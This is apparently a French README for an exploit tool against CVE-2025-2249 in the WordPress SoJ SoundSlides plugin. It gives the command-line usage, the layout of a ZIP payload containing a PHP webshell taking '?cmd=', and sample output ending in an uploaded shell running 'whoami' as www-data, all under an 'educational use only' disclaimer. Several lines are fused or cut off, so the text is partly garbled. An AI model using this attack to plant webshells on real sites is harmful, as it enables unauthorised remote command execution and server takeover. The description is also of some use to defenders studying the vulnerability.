
Le plugin WordPress SoJ SoundSlides <= 1.2.2 est vulnérable à un téléchargement arbitraire de fichier.
⚠️ AVERTISSEMENT : Cet exploit est destiné uniquement à des fins éducatives et de test autorisé.
Le plugin SoJ SoundSlides permet aux utilisateurs authentifiés avec un rôle Contributeur ou supérieur de télécharger des fichiers ZIP arbitraires. En raison d'une validation manquante, les attaquants peuvent télécharger des webshells PHP qui sont extraits et exécutés depuis un répertoire accessible via le web.
Un attaquant disposant d'identifiants WordPress valides peut :
?cmd=)usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,
options:
-h, --help show this help message and exit
-u, --url URL WordPress base URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
| Argument | Description |
|---|---|
-u | URL de base WordPress |
-un | Nom d'utilisateur WordPress |
-p | Mot de passe WordPress |
readme.txt du pluginnxploit/
├── index.html
├── data/
│ └── data.xml
├── audio/
│ └── audio.mp3
└── nxploit.php ← PHP shell (?cmd=)
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
wp-content/uploads/ pour des fichiers .php inattendusConstruit avec ❤️ par [Nxploited | Khaled ALenazi]
Pour l'éducation, la sensibilisation et la défense.
La sécurité est la responsabilité de tous. Testez toujours de manière éthique, signalez de manière responsable et protégez le web.